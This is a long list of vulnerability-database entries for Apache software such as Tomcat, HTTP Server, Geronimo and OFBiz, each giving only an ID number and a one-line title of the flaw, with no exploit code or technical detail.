| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
13819| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
13820| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
13821| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
13822| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
13823| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
13824| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
13825| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
13826| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
13827| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
13828| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
13829| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
13830| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
13831| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
13832| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
13833| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
13834| [40262] Apache HTTP Server mod_status refresh XSS
13835| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
13836| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
13837| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
13838| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
13839| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
13840| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
13841| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
13842| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
13843| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
13844| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
13845| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
13846| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
13847| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
13848| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
13849| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
13850| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
13851| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
13852| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
13853| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
13854| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
13855| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
13856| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
13857| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
13858| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
13859| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
13860| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
13861| [36080] Apache Tomcat JSP Examples Crafted URI XSS
13862| [36079] Apache Tomcat Manager Uploaded Filename XSS
13863| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
13864| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
13865| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
13866| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
13867| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
13868| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
13869| [34881] Apache Tomcat Malformed Accept-Language Header XSS
13870| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
13871| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
13872| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
13873| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
13874| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
13875| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
13876| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
13877| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
13878| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
13879| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
13880| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
13881| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
13882| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
13883| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
13884| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
13885| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
13886| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
13887| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
13888| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
13889| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
13890| [32724] Apache mod_python _filter_read Freed Memory Disclosure
13891| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
13892| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
13893| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
13894| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
13895| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
13896| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
13897| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
13898| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
13899| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
13900| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
13901| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
13902| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
13903| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
13904| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
13905| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
13906| [24365] Apache Struts Multiple Function Error Message XSS
13907| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
13908| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
13909| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
13910| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
13911| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
13912| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
13913| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
13914| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
13915| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
13916| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
13917| [22459] Apache Geronimo Error Page XSS
13918| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
13919| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
13920| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
13921| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
13922| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
13923| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
13924| [21021] Apache Struts Error Message XSS
13925| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
13926| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
13927| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
13928| [20439] Apache Tomcat Directory Listing Saturation DoS
13929| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
13930| [20285] Apache HTTP Server Log File Control Character Injection
13931| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
13932| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
13933| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
13934| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
13935| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
13936| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
13937| [19821] Apache Tomcat Malformed Post Request Information Disclosure
13938| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
13939| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
13940| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
13941| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
13942| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
13943| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
13944| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
13945| [18233] Apache HTTP Server htdigest user Variable Overfow
13946| [17738] Apache HTTP Server HTTP Request Smuggling
13947| [16586] Apache HTTP Server Win32 GET Overflow DoS
13948| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
13949| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
13950| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
13951| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
13952| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
13953| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
13954| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
13955| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
13956| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
13957| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
13958| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
13959| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
13960| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
13961| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
13962| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
13963| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
13964| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
13965| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
13966| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
13967| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
